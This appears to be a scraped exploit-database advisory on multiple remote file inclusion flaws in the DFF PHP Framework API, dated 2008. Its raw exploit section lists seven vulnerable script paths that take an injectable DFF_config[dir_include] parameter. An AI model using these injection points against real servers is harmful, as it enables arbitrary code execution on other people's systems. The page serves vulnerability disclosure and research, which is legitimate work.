DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities

vendor:

DFF PHP Framework API

by:

milw0rm.com

7.5

CVSS

HIGH

Multiple Inclusion Vulnerabilities

CWE

Product Name: DFF PHP Framework API

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities

DFF PHP Framework API (Data Feed File) is vulnerable to multiple inclusion vulnerabilities. An attacker can exploit these vulnerabilities by sending a crafted request to the vulnerable script with the DFF_config[dir_include] parameter set to a malicious file. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
# Exploits :
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
# Tryag.cc/cc

# milw0rm.com [2008-10-08]